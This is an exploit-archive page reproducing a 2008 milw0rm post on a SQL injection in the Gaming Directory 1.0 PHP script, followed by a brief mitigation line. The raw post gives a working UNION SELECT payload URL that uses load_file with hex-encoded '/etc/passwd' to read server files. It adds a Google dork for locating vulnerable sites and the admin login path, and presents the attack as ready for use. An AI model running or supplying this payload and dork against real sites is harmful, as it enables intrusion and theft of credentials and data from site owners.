header-logo
Suggest Exploit
vendor:
Gaming Directory
by:
t0pP8uZz
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Gaming Directory
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE: N/A
CPE: a:turnkeyzone:gaming_directory
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2008

Gaming Directory 1.0 SQL Injection Vulnerbilitys

This popular gaming directory script is vulnerable due to insecure mysql querys. This allows the remote attacker to pull info from the database. The below Injection uses MYSQL's load_file function, since the admin area password is stored in a config file we can use load_file to to try and locate it and display the contents of the file. Certain permissons to the running db user is required for this to work. In the load_file below is a string that has been converted to HEX and if you can read hex then its /etc/passwd so this should load the /etc/passwd file on most linux distros. Remember certain permissions are needed.

Mitigation:

Ensure that all user-supplied input is properly validated and filtered before being used in SQL queries.
Source

Exploit-DB raw data:

--==+================================================================================+==--
--==+		    Gaming Directory 1.0 SQL Injection Vulnerbilitys	             +==--
--==+================================================================================+==--



Discovered By: t0pP8uZz
Discovered On: 5 April 2008
SITE: http://www.turnkeyzone.com/
Google Dork: inurl:"directory.php?ax=list" gaming


DESCRIPTION: 
this popular gaming directory script is vulnerable due to insecure mysql querys.
this allows the remote attacker to pull info from the database.

The below Injection uses MYSQL's load_file function, since the admin area password is stored
in a config file we can use load_file to to try and locate it and display the contents of the file. 
certain permissons to the running db user is required for this to work. in the load_file below
is a string that has been converted to HEX and if you can read hex then its /etc/passwd so this
should load the /etc/passwd file on most linux distros. Remember certain permissions are needed.


EXPLOITS:
http://site.com/directory.php?ax=list&sub=6&cat_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,load_file(0x2F6574632F706173737764),4/**/FROM/**/links/*


NOTE/TIP: 
admin login is at /siteadmin/


GREETZ: milw0rm.com, H4CK-Y0u.org, CipherCrew!



--==+================================================================================+==--
--==+		    Gaming Directory 1.0 SQL Injection Vulnerbilitys	             +==--
--==+================================================================================+==--

# milw0rm.com [2008-04-05]

Navigation

Suggest Exploit

Services By CQR